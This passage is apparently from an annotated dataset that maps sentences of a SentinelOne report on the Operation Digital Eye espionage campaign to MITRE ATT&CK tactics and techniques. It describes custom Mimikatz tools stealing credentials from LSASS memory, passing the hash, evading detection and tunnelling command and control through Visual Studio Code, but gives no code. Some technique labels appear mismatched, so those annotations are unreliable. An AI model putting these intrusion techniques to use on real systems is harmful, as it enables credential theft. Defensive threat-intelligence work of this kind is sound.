"label": "MalwareTool" }, { "text": "Creates\na suspended process", "start": 45, "end": 72, "label": "Action" }, { "text": "in a new logon session", "start": 73, "end": 95, "label": "Action" } ] }, { "uid": "sentinel-62_SentinelOne_report-p1-s77-b8e381", "source": "sentinel", "doc_id": "62_SentinelOne_report", "page_number": 1, "sentence_id": 77, "context_before": "In summary, bK2o.exe performs the following:\nCreates\na suspended process in a new logon session, specifying the attacker-provided process, username, domain, and an empty password.", "sentence_text": "Based on the session’s locally unique identifier (LUID), locates and extracts from the LSASS process memory an encrypted credential data blob containing the user’s NTLM hash and the encryption keys required to decrypt the blob.", "relevant": "yes", "tactic": [ { "id": "TA0006", "name": "Credential Access" } ], "techniques": [ { "id": "T1003.001", "name": "LSASS Memory" } ], "procedure": "locates and extracts from the LSASS process memory an encrypted credential data blob", "entities": [ { "text": "locates and extracts from the LSASS process memory ", "start": 57, "end": 108, "label": "Action" } ] }, { "uid": "sentinel-62_SentinelOne_report-p1-s78-348cc5", "source": "sentinel", "doc_id": "62_SentinelOne_report", "page_number": 1, "sentence_id": 78, "context_before": "Based on the session’s locally unique identifier (LUID), locates and extracts from the LSASS process memory an encrypted credential data blob containing the user’s NTLM hash and the encryption keys required to decrypt the blob.", "sentence_text": "Resumes the suspended process.", "relevant": "yes", "tactic": [ { "id": "TA0002", "name": "Execution" } ], "techniques": [ { "id": "T1106", "name": "Native API" } ], "procedure": "The malware resumes a suspended process.", "entities": [ { "text": "Resumes the suspended process", "start": 0, "end": 29, "label": "Action" } ] }, { "uid": "sentinel-62_SentinelOne_report-p1-s79-d59383", "source": "sentinel", "doc_id": "62_SentinelOne_report", "page_number": 1, "sentence_id": 79, "context_before": "Resumes the suspended process.", "sentence_text": "To navigate LSASS memory, bK2o.exe uses code signatures, represented as byte sequences in hexadecimal format.", "relevant": "yes", "tactic": [ { "id": "TA0006", "name": "Credential Access" } ], "techniques": [ { "id": "T1003.003", "name": "NTDS" } ], "procedure": "Navigates LSASS memory using code signatures (byte sequences in hexadecimal)", "entities": [ { "text": "bK2o.exe", "start": 26, "end": 34, "label": "MalwareTool" }, { "text": "To navigate LSASS memory, bK2o.exe uses code signatures", "start": 0, "end": 55, "label": "Action" } ] }, { "uid": "sentinel-62_SentinelOne_report-p1-s80-8696ab", "source": "sentinel", "doc_id": "62_SentinelOne_report", "page_number": 1, "sentence_id": 80, "context_before": "To navigate LSASS memory, bK2o.exe uses code signatures, represented as byte sequences in hexadecimal format.", "sentence_text": "These sequences correspond to known LSASS instructions, which serve as navigation points within the memory.", "relevant": "yes", "tactic": [ { "id": "TA0006", "name": "Credential Access" } ], "techniques": [ { "id": "T1003.001", "name": "LSASS Memory" } ], "procedure": "Uses LSASS instruction sequences as navigation points in memory", "entities": [ { "text": "correspond to known LSASS instructions", "start": 16, "end": 54, "label": "Action" } ] }, { "uid": "sentinel-62_SentinelOne_report-p1-s81-ff0671", "source": "sentinel", "doc_id": "62_SentinelOne_report", "page_number": 1, "sentence_id": 81, "context_before": "These sequences correspond to known LSASS instructions, which serve as navigation points within the memory.", "sentence_text": "To hinder static analysis and evade detection, bK2o.exe obfuscates code signatures and strings by constructing them dynamically on the stack at runtime, instead of storing them as static data.", "relevant": "yes", "tactic": [ { "id": "TA0005", "name": "Defense Evasion" } ], "techniques": [ { "id": "T1027", "name": "Obfuscated Files or Information" } ], "procedure": "Obfuscates code signatures and strings at runtime to evade detection", "entities": [ { "text": " bK2o.exe", "start": 46, "end": 55, "label": "MalwareTool" }, { "text": "obfuscates code signatures and strings by constructing them dynamically on the stack at runtime,", "start": 56, "end": 152, "label": "Action" } ] }, { "uid": "sentinel-62_SentinelOne_report-p1-s82-3b9eac", "source": "sentinel", "doc_id": "62_SentinelOne_report", "page_number": 1, "sentence_id": 82, "context_before": "To hinder static analysis and evade detection, bK2o.exe obfuscates code signatures and strings by constructing them dynamically on the stack at runtime, instead of storing them as static data.", "sentence_text": "From Operation Digital Eye to Tainted Love and Soft Cell We identified two additional samples uploaded to malware sharing platforms that construct code signatures on the stack, which we refer to as wsx1.exe and wsx1.exe .", "relevant": "yes", "tactic": [ { "id": "TA0005", "name": "Defense Evasion" } ], "techniques": [ { "id": "T1027", "name": "Obfuscated Files or Information" } ], "procedure": "Constructs code signatures on the stack", "entities": [ { "text": "wsx1.exe", "start": 198, "end": 206, "label": "MalwareTool" }, { "text": "wsx1.exe", "start": 211, "end": 219, "label": "MalwareTool" }, { "text": "construct code signatures on the stack", "start": 137, "end": 175, "label": "Action" } ] }, { "uid": "sentinel-62_SentinelOne_report-p1-s83-4aa978", "source": "sentinel", "doc_id": "62_SentinelOne_report", "page_number": 1, "sentence_id": 83, "context_before": "From Operation Digital Eye to Tainted Love and Soft Cell We identified two additional samples uploaded to malware sharing platforms that construct code signatures on the stack, which we refer to as wsx1.exe and wsx1.exe .", "sentence_text": "Like bK2o.exe , both wsx.exe and wsx1.exe are custom modified versions of Mimikatz and implement pass-the-hash functionality.", "relevant": "yes", "tactic": [ { "id": "TA0006", "name": "Credential Access" } ], "techniques": [ { "id": "T1550.002", "name": "Pass the Hash" } ], "procedure": "implement pass-the-hash functionality", "entities": [ { "text": " bK2o.exe ", "start": 4, "end": 14, "label": "MalwareTool" }, { "text": "wsx1.exe", "start": 33, "end": 41, "label": "MalwareTool" }, { "text": "wsx.exe", "start": 21, "end": 28, "label": "MalwareTool" }, { "text": "implement pass-the-hash functionality.", "start": 87, "end": 125, "label": "Action" } ] }, { "uid": "sentinel-62_SentinelOne_report-p1-s84-38c7a2", "source": "sentinel", "doc_id": "62_SentinelOne_report", "page_number": 1, "sentence_id": 84, "context_before": "Like bK2o.exe , both wsx.exe and wsx1.exe are custom modified versions of Mimikatz and implement pass-the-hash functionality.", "sentence_text": "Substantial code segments in wsx.exe and wsx1.exe , which implement the construction of code signatures on the stack, overlap with those in bK2o.exe , including identical mov instruction operand sizes and values.", "relevant": "yes", "tactic": [ { "id": "TA0005", "name": "Defense Evasion" } ], "techniques": [ { "id": "T1027", "name": "Obfuscated Files or Information" } ], "procedure": "implement the construction of code signatures on the stack", "entities": [ { "text": "wsx.exe", "start": 29, "end": 36, "label": "MalwareTool" }, { "text": "wsx1.exe ", "start": 41, "end": 50, "label": "MalwareTool" }, { "text": "bK2o.exe", "start": 140, "end": 148, "label": "MalwareTool" }, { "text": "implement the construction of code signatures on the stack", "start": 58, "end": 116, "label": "Action" } ] }, { "uid": "sentinel-62_SentinelOne_report-p1-s85-03adad", "source": "sentinel", "doc_id": "62_SentinelOne_report", "page_number": 1, "sentence_id": 85, "context_before": "Substantial code segments in wsx.exe and wsx1.exe , which implement the construction of code signatures on the stack, overlap with those in bK2o.exe , including identical mov instruction operand sizes and values.", "sentence_text": "This suggests that wsx.exe , wsx1.exe , and bK2o.exe are highly likely derived from the same source.", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "sentinel-62_SentinelOne_report-p1-s86-271fed", "source": "sentinel", "doc_id": "62_SentinelOne_report", "page_number": 1, "sentence_id": 86, "context_before": "This suggests that wsx.exe , wsx1.exe , and bK2o.exe are highly likely derived from the same source.", "sentence_text": "In turn, we observed overlaps between wsx.exe , wsx1.exe , and mim221 components.", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "sentinel-62_SentinelOne_report-p1-s87-392c86", "source": "sentinel", "doc_id": "62_SentinelOne_report", "page_number": 1, "sentence_id": 87, "context_before": "In turn, we observed overlaps between wsx.exe , wsx1.exe , and mim221 components.", "sentence_text": "We attributed Operation Tainted Love to a suspected Chinese cyberespionage group within the nexus of Granite Typhoon (formerly known as Gallium) and APT41, while acknowledging the possibility of tool sharing among Chinese state-sponsored threat actors and the potential involvement of a shared vendor or digital quartermaster.", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "sentinel-62_SentinelOne_report-p1-s88-4a9f4c", "source": "sentinel", "doc_id": "62_SentinelOne_report", "page_number": 1, "sentence_id": 88, "context_before": "We attributed Operation Tainted Love to a suspected Chinese cyberespionage group within the nexus of Granite Typhoon (formerly known as Gallium) and APT41, while acknowledging the possibility of tool sharing among Chinese state-sponsored threat actors and the potential involvement of a shared vendor or digital quartermaster.", "sentence_text": "We assess that mim221 represents an evolution of tooling associated with Operation Soft Cell , such as simplify_32.exe .", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "sentinel-62_SentinelOne_report-p1-s89-b3ebbe", "source": "sentinel", "doc_id": "62_SentinelOne_report", "page_number": 1, "sentence_id": 89, "context_before": "We assess that mim221 represents an evolution of tooling associated with Operation Soft Cell , such as simplify_32.exe .", "sentence_text": "mim221 has a multi-component architecture, with a single executable staging three components — pc.dll , AddSecurityPackage64.dll , and getHashFlsa64.dll — using techniques such as decryption, injection, and reflective image loading.", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "sentinel-62_SentinelOne_report-p1-s90-941da5", "source": "sentinel", "doc_id": "62_SentinelOne_report", "page_number": 1, "sentence_id": 90, "context_before": "mim221 has a multi-component architecture, with a single executable staging three components — pc.dll , AddSecurityPackage64.dll , and getHashFlsa64.dll — using techniques such as decryption, injection, and reflective image loading.", "sentence_text": "These components share several overlaps with bK2o.exe , wsx.exe , and wsx1.exe To hinder static analysis, some mim221 components also obfuscate strings by constructing them on the stack at runtime.", "relevant": "yes", "tactic": [ { "id": "TA0005", "name": "Defense Evasion" } ], "techniques": [ { "id": "T1027", "name": "Obfuscated Files or Information" } ], "procedure": "Obfuscates strings at runtime to hinder static analysis", "entities": [ { "text": "mim221", "start": 111, "end": 117, "label": "MalwareTool" }, { "text": "bK2o.exe", "start": 45, "end": 53, "label": "MalwareTool" }, { "text": "wsx.exe", "start": 56, "end": 63, "label": "MalwareTool" }, { "text": "wsx1.exe", "start": 70, "end": 78, "label": "MalwareTool" }, { "text": "obfuscate strings by constructing them on the stack at runtime.", "start": 134, "end": 197, "label": "Action" } ] }, { "uid": "sentinel-62_SentinelOne_report-p1-s91-d28dd7", "source": "sentinel", "doc_id": "62_SentinelOne_report", "page_number": 1, "sentence_id": 91, "context_before": "These components share several overlaps with bK2o.exe , wsx.exe , and wsx1.exe To hinder static analysis, some mim221 components also obfuscate strings by constructing them on the stack at runtime.", "sentence_text": "Additionally, the mim221 components AddSecurityPackage64.dll and getHashFlsa64.dll implement error logging similar to that of wsx.exe and wsx1.exe , including identical custom error messages, a consistent output format, and the same English-language errors.", "relevant": "yes", "tactic": [ { "id": "TA0005", "name": "Defense Evasion" } ], "techniques": [ { "id": "T1070.004", "name": "File Deletion" } ], "procedure": "Implements custom error logging", "entities": [ { "text": "mim221", "start": 18, "end": 24, "label": "MalwareTool" }, { "text": "AddSecurityPackage64.dll ", "start": 36, "end": 61, "label": "MalwareTool" }, { "text": "getHashFlsa64.dll", "start": 65, "end": 82, "label": "MalwareTool" }, { "text": "wsx1.exe", "start": 138, "end": 146, "label": "MalwareTool" }, { "text": "wsx.exe", "start": 126, "end": 133, "label": "MalwareTool" }, { "text": " implement error logging similar to that of wsx.exe and wsx1.exe", "start": 82, "end": 146, "label": "Action" } ] }, { "uid": "sentinel-62_SentinelOne_report-p1-s92-fc67c2", "source": "sentinel", "doc_id": "62_SentinelOne_report", "page_number": 1, "sentence_id": 92, "context_before": "Additionally, the mim221 components AddSecurityPackage64.dll and getHashFlsa64.dll implement error logging similar to that of wsx.exe and wsx1.exe , including identical custom error messages, a consistent output format, and the same English-language errors.", "sentence_text": "In addition, RTTI (Run-Time Type Information) information stored in wsx.exe , wsx1.exe , and the mim221 component getHashFlsa64.dll reveals that classes with the same names are declared across these executables.", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "sentinel-62_SentinelOne_report-p1-s93-bb3cf7", "source": "sentinel", "doc_id": "62_SentinelOne_report", "page_number": 1, "sentence_id": 93, "context_before": "In addition, RTTI (Run-Time Type Information) information stored in wsx.exe , wsx1.exe , and the mim221 component getHashFlsa64.dll reveals that classes with the same names are declared across these executables.", "sentence_text": "We have not observed these class names in open-source or publicly available tooling.", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "sentinel-62_SentinelOne_report-p1-s94-654cce", "source": "sentinel", "doc_id": "62_SentinelOne_report", "page_number": 1, "sentence_id": 94, "context_before": "We have not observed these class names in open-source or publicly available tooling.", "sentence_text": "mimCN | A Collection of China-Nexus APT Tools Due to the previously discussed overlaps between bK2o.exe (used in Operation Digital Eye), wsx.exe , wsx1.exe , mim221 components (used in Operation Tainted Love), and simplify_32.exe (used in Operation Soft Cell), we collectively refer to this collection of tools as mimCN.", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "sentinel-62_SentinelOne_report-p1-s95-4e08f9", "source": "sentinel", "doc_id": "62_SentinelOne_report", "page_number": 1, "sentence_id": 95, "context_before": "mimCN | A Collection of China-Nexus APT Tools Due to the previously discussed overlaps between bK2o.exe (used in Operation Digital Eye), wsx.exe , wsx1.exe , mim221 components (used in Operation Tainted Love), and simplify_32.exe (used in Operation Soft Cell), we collectively refer to this collection of tools as mimCN.", "sentence_text": "We include in the mimCN tool collection not only the previously mentioned tools but also any other custom modifications of Mimikatz that have overlaps with other mimCN executables, suggesting they may originate from the same source.", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "sentinel-62_SentinelOne_report-p1-s96-fe8bed", "source": "sentinel", "doc_id": "62_SentinelOne_report", "page_number": 1, "sentence_id": 96, "context_before": "We include in the mimCN tool collection not only the previously mentioned tools but also any other custom modifications of Mimikatz that have overlaps with other mimCN executables, suggesting they may originate from the same source.", "sentence_text": "Such overlaps include shared code-signing certificates and the use of unique custom error messages or obfuscation techniques.", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "sentinel-62_SentinelOne_report-p1-s97-ef3c72", "source": "sentinel", "doc_id": "62_SentinelOne_report", "page_number": 1, "sentence_id": 97, "context_before": "Such overlaps include shared code-signing certificates and the use of unique custom error messages or obfuscation techniques.", "sentence_text": "To date, we have observed mimCN tools exclusively in the context of suspected Chinese APT activities.", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "sentinel-62_SentinelOne_report-p1-s98-320932", "source": "sentinel", "doc_id": "62_SentinelOne_report", "page_number": 1, "sentence_id": 98, "context_before": "To date, we have observed mimCN tools exclusively in the context of suspected Chinese APT activities.", "sentence_text": "Although the compilation timestamps of the mimCN samples observed in these intrusions could have been manipulated, the proximity of the timestamps to when the activities occurred suggests that they are likely authentic.", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "sentinel-62_SentinelOne_report-p1-s100-762cf6", "source": "sentinel", "doc_id": "62_SentinelOne_report", "page_number": 1, "sentence_id": 100, "context_before": "eg, /cmd:", "sentence_text": "xxx and [ERROR]Please input ip.", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "sentinel-62_SentinelOne_report-p1-s101-c52bec", "source": "sentinel", "doc_id": "62_SentinelOne_report", "page_number": 1, "sentence_id": 101, "context_before": "xxx and [ERROR]Please input ip.", "sentence_text": "eg, /ip:xx.XXX.xx.x or /ip:xxx.com , suggest the involvement of a dedicated development team that is leaving instructions for a separate group of operators.", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "sentinel-62_SentinelOne_report-p1-s102-6f03f3", "source": "sentinel", "doc_id": "62_SentinelOne_report", "page_number": 1, "sentence_id": 102, "context_before": "eg, /ip:xx.XXX.xx.x or /ip:xxx.com , suggest the involvement of a dedicated development team that is leaving instructions for a separate group of operators.", "sentence_text": "Combined with the presence of overlapping mimCN samples across various intrusions attributed to China-nexus APT groups and distributed over years, this suggests that mimCN is likely the product of an entity responsible for maintaining and provisioning tools to multiple clusters within the Chinese APT ecosystem.", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "sentinel-62_SentinelOne_report-p1-s103-7e5d63", "source": "sentinel", "doc_id": "62_SentinelOne_report", "page_number": 1, "sentence_id": 103, "context_before": "Combined with the presence of overlapping mimCN samples across various intrusions attributed to China-nexus APT groups and distributed over years, this suggests that mimCN is likely the product of an entity responsible for maintaining and provisioning tools to multiple clusters within the Chinese APT ecosystem.", "sentence_text": "Attribution Analysis\nWe assess that Operation Digital Eye was highly likely conducted by a China-nexus cluster with cyberespionage motivations.", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "sentinel-62_SentinelOne_report-p1-s104-9541c9", "source": "sentinel", "doc_id": "62_SentinelOne_report", "page_number": 1, "sentence_id": 104, "context_before": "Attribution Analysis\nWe assess that Operation Digital Eye was highly likely conducted by a China-nexus cluster with cyberespionage motivations.", "sentence_text": "Malware\nA variant of the PHPsert webshell contains code comments in simplified Chinese.", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "sentinel-62_SentinelOne_report-p1-s105-57fff7", "source": "sentinel", "doc_id": "62_SentinelOne_report", "page_number": 1, "sentence_id": 105, "context_before": "Malware\nA variant of the PHPsert webshell contains code comments in simplified Chinese.", "sentence_text": "This suggests the potential involvement of Chinese-speaking developers.", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "sentinel-62_SentinelOne_report-p1-s106-f95aed", "source": "sentinel", "doc_id": "62_SentinelOne_report", "page_number": 1, "sentence_id": 106, "context_before": "This suggests the potential involvement of Chinese-speaking developers.", "sentence_text": "Further, the custom Mimikatz modification bK2o.exe used in Operation Digital Eye is part of the mimCN collection and shares implementation overlaps with other custom Mimikatz modifications, suggesting a common origin.", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "sentinel-62_SentinelOne_report-p1-s107-da237c", "source": "sentinel", "doc_id": "62_SentinelOne_report", "page_number": 1, "sentence_id": 107, "context_before": "Further, the custom Mimikatz modification bK2o.exe used in Operation Digital Eye is part of the mimCN collection and shares implementation overlaps with other custom Mimikatz modifications, suggesting a common origin.", "sentence_text": "These tools have been observed exclusively in the context of suspected Chinese APT activities, such as Operation Soft Cell and Operation Tainted Love .", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "sentinel-62_SentinelOne_report-p1-s108-0e5658", "source": "sentinel", "doc_id": "62_SentinelOne_report", "page_number": 1, "sentence_id": 108, "context_before": "These tools have been observed exclusively in the context of suspected Chinese APT activities, such as Operation Soft Cell and Operation Tainted Love .", "sentence_text": "The mimCN tool collection suggests the presence of a shared vendor or digital quartermaster responsible for the sustained development and provisioning of tools to groups within the Chinese APT ecosystem.", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "sentinel-62_SentinelOne_report-p1-s109-765e24", "source": "sentinel", "doc_id": "62_SentinelOne_report", "page_number": 1, "sentence_id": 109, "context_before": "The mimCN tool collection suggests the presence of a shared vendor or digital quartermaster responsible for the sustained development and provisioning of tools to groups within the Chinese APT ecosystem.", "sentence_text": "This function is suspected to play a significant role in the Chinese threat landscape.", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "sentinel-62_SentinelOne_report-p1-s110-4725b4", "source": "sentinel", "doc_id": "62_SentinelOne_report", "page_number": 1, "sentence_id": 110, "context_before": "This function is suspected to play a significant role in the Chinese threat landscape.", "sentence_text": "One example is the M247 infrastructure attributed to the suspected Chinese cluster STORM-0866 (also known as Red Dev 40), with which the Sandman APT group is associated.", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "sentinel-62_SentinelOne_report-p1-s111-23b0a1", "source": "sentinel", "doc_id": "62_SentinelOne_report", "page_number": 1, "sentence_id": 111, "context_before": "One example is the M247 infrastructure attributed to the suspected Chinese cluster STORM-0866 (also known as Red Dev 40), with which the Sandman APT group is associated.", "sentence_text": "Additionally, the use of Cloud services and resources located in geographic proximity to the targeted organizations in Operation Digital Eye suggests a carefully planned and targeted infrastructure management approach.", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "sentinel-62_SentinelOne_report-p1-s112-345845", "source": "sentinel", "doc_id": "62_SentinelOne_report", "page_number": 1, "sentence_id": 112, "context_before": "Additionally, the use of Cloud services and resources located in geographic proximity to the targeted organizations in Operation Digital Eye suggests a carefully planned and targeted infrastructure management approach.", "sentence_text": "Abuse of Visual Studio Code", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "sentinel-62_SentinelOne_report-p1-s113-1e7326", "source": "sentinel", "doc_id": "62_SentinelOne_report", "page_number": 1, "sentence_id": 113, "context_before": "Abuse of Visual Studio Code", "sentence_text": "Our visibility into threat actor activities suggests that the abuse of Visual Studio Code tunneling for C2 purposes was relatively rare in the wild before Operation Digital Eye.", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "sentinel-62_SentinelOne_report-p1-s114-a78853", "source": "sentinel", "doc_id": "62_SentinelOne_report", "page_number": 1, "sentence_id": 114, "context_before": "Our visibility into threat actor activities suggests that the abuse of Visual Studio Code tunneling for C2 purposes was relatively rare in the wild before Operation Digital Eye.", "sentence_text": "Previous\nresearch\nindicates that, starting in 2023, a suspected North Korean group has used Visual Studio Remote Tunnels to maintain persistence in compromised networks.", "relevant": "yes", "tactic": [ { "id": "TA0003", "name": "Persistence" } ], "techniques": [ { "id": "T1572", "name": "Protocol Tunneling" } ], "procedure": "Use Visual Studio Remote Tunnels to maintain persistent access within compromised networks", "entities": [ { "text": "suspected North Korean group", "start": 54, "end": 82, "label": "ThreatActor" }, { "text": "used Visual Studio Remote Tunnels to maintain persistence", "start": 87, "end": 144, "label": "Action" }, { "text": "Visual Studio Remote Tunnels", "start": 92, "end": 120, "label": "Infrastructure_Indicator" }, { "text": "compromised networks", "start": 148, "end": 168, "label": "Infrastructure_Indicator" } ] }, { "uid": "sentinel-62_SentinelOne_report-p1-s115-3e46f9", "source": "sentinel", "doc_id": "62_SentinelOne_report", "page_number": 1, "sentence_id": 115, "context_before": "Previous\nresearch\nindicates that, starting in 2023, a suspected North Korean group has used Visual Studio Remote Tunnels to maintain persistence in compromised networks.", "sentence_text": "As of this writing, the only publicly disclosed use of this technique around the time of Operation Digital Eye has been attributed to a suspected Chinese APT group.", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "sentinel-62_SentinelOne_report-p1-s116-7f9828", "source": "sentinel", "doc_id": "62_SentinelOne_report", "page_number": 1, "sentence_id": 116, "context_before": "As of this writing, the only publicly disclosed use of this technique around the time of Operation Digital Eye has been attributed to a suspected Chinese APT group.", "sentence_text": "The campaign was attributed to Stately Taurus (also known as Mustang Panda).", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "sentinel-62_SentinelOne_report-p1-s117-1995ec", "source": "sentinel", "doc_id": "62_SentinelOne_report", "page_number": 1, "sentence_id": 117, "context_before": "The campaign was attributed to Stately Taurus (also known as Mustang Panda).", "sentence_text": "The exact timeline of the campaign is unclear, with mid-August 2024 being the only reference point explicitly mentioned in the Unit 42 report.", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "sentinel-62_SentinelOne_report-p1-s118-eedb5f", "source": "sentinel", "doc_id": "62_SentinelOne_report", "page_number": 1, "sentence_id": 118, "context_before": "The exact timeline of the campaign is unclear, with mid-August 2024 being the only reference point explicitly mentioned in the Unit 42 report.", "sentence_text": "Based on this, we suspect that Operation Digital Eye occurred prior to this activity.", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "sentinel-62_SentinelOne_report-p1-s119-4137b0", "source": "sentinel", "doc_id": "62_SentinelOne_report", "page_number": 1, "sentence_id": 119, "context_before": "Based on this, we suspect that Operation Digital Eye occurred prior to this activity.", "sentence_text": "We did not observe any overlaps in TTPs between Operation Digital Eye and the activity reported by Unit 42, except for the abuse of Visual Studio Code.", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "sentinel-62_SentinelOne_report-p1-s120-db6b3c", "source": "sentinel", "doc_id": "62_SentinelOne_report", "page_number": 1, "sentence_id": 120, "context_before": "We did not observe any overlaps in TTPs between Operation Digital Eye and the activity reported by Unit 42, except for the abuse of Visual Studio Code.", "sentence_text": "We recognize the possibility that distinct Chinese APT clusters may share operational playbooks that include leveraging Visual Studio Code for C2 purposes.", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "sentinel-62_SentinelOne_report-p1-s121-061759", "source": "sentinel", "doc_id": "62_SentinelOne_report", "page_number": 1, "sentence_id": 121, "context_before": "We recognize the possibility that distinct Chinese APT clusters may share operational playbooks that include leveraging Visual Studio Code for C2 purposes.", "sentence_text": "Temporal Analysis\nOur analysis of timestamps marking the dates and times of operator activity in the targeted organizations showed that all activities occurred on workdays (Monday to Friday).", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "sentinel-62_SentinelOne_report-p1-s122-8c3e39", "source": "sentinel", "doc_id": "62_SentinelOne_report", "page_number": 1, "sentence_id": 122, "context_before": "Temporal Analysis\nOur analysis of timestamps marking the dates and times of operator activity in the targeted organizations showed that all activities occurred on workdays (Monday to Friday).", "sentence_text": "This suggests a potentially state-sanctioned operation.", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "sentinel-62_SentinelOne_report-p1-s123-790f5e", "source": "sentinel", "doc_id": "62_SentinelOne_report", "page_number": 1, "sentence_id": 123, "context_before": "This suggests a potentially state-sanctioned operation.", "sentence_text": "The figure below shows the total number of connections established by the threat actors to Visual Studio Code tunnels throughout Operation Digital Eye, broken down by hour of the day.", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "sentinel-62_SentinelOne_report-p1-s124-89294e", "source": "sentinel", "doc_id": "62_SentinelOne_report", "page_number": 1, "sentence_id": 124, "context_before": "The figure below shows the total number of connections established by the threat actors to Visual Studio Code tunnels throughout Operation Digital Eye, broken down by hour of the day.", "sentence_text": "The data is presented in both the original time zone (CEST) and in China Standard Time (CST, CEST+6).", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "sentinel-62_SentinelOne_report-p1-s125-fd1995", "source": "sentinel", "doc_id": "62_SentinelOne_report", "page_number": 1, "sentence_id": 125, "context_before": "The data is presented in both the original time zone (CEST) and in China Standard Time (CST, CEST+6).", "sentence_text": "Conclusions\nOperation Digital Eye highlights the persistent threat posed by Chinese cyberespionage groups to European entities, with these threat actors continuing to focus on high-value targets.", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "sentinel-62_SentinelOne_report-p1-s126-74f3ba", "source": "sentinel", "doc_id": "62_SentinelOne_report", "page_number": 1, "sentence_id": 126, "context_before": "Conclusions\nOperation Digital Eye highlights the persistent threat posed by Chinese cyberespionage groups to European entities, with these threat actors continuing to focus on high-value targets.", "sentence_text": "The abuse of Visual Studio Code Remote Tunnels in this campaign illustrates how Chinese APT groups often rely on practical, solution-oriented approaches to evade detection.", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "sentinel-62_SentinelOne_report-p1-s127-80ab9a", "source": "sentinel", "doc_id": "62_SentinelOne_report", "page_number": 1, "sentence_id": 127, "context_before": "The abuse of Visual Studio Code Remote Tunnels in this campaign illustrates how Chinese APT groups often rely on practical, solution-oriented approaches to evade detection.", "sentence_text": "By leveraging a trusted development tool and infrastructure, the threat actors aimed to disguise their malicious activities as legitimate.", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "sentinel-62_SentinelOne_report-p1-s128-7290e7", "source": "sentinel", "doc_id": "62_SentinelOne_report", "page_number": 1, "sentence_id": 128, "context_before": "By leveraging a trusted development tool and infrastructure, the threat actors aimed to disguise their malicious activities as legitimate.", "sentence_text": "The exploitation of widely used technologies, which security teams may not scrutinize closely, presents a growing challenge for organizations.", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "sentinel-62_SentinelOne_report-p1-s129-56901d", "source": "sentinel", "doc_id": "62_SentinelOne_report", "page_number": 1, "sentence_id": 129, "context_before": "The exploitation of widely used technologies, which security teams may not scrutinize closely, presents a growing challenge for organizations.", "sentence_text": "For defenders, this calls for a reevaluation of traditional security approaches and the implementation of robust detection mechanisms to identify such evasive techniques in real time.", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "sentinel-62_SentinelOne_report-p1-s130-6fa560", "source": "sentinel", "doc_id": "62_SentinelOne_report", "page_number": 1, "sentence_id": 130, "context_before": "For defenders, this calls for a reevaluation of traditional security approaches and the implementation of robust detection mechanisms to identify such evasive techniques in real time.", "sentence_text": "Lateral movement capabilities observed in Operation Digital Eye, linked to custom Mimikatz modifications used in previous campaigns, indicate the potential involvement of shared vendors or digital quartermasters and the important function they serve in the Chinese APT ecosystem.", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "sentinel-62_SentinelOne_report-p1-s131-e47885", "source": "sentinel", "doc_id": "62_SentinelOne_report", "page_number": 1, "sentence_id": 131, "context_before": "Lateral movement capabilities observed in Operation Digital Eye, linked to custom Mimikatz modifications used in previous campaigns, indicate the potential involvement of shared vendors or digital quartermasters and the important function they serve in the Chinese APT ecosystem.", "sentence_text": "These centralized entities provide continuity and adaptability to cyberespionage operations, equipping threat actors with consistently updated tools and evolving tactics as they target new victims.", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": 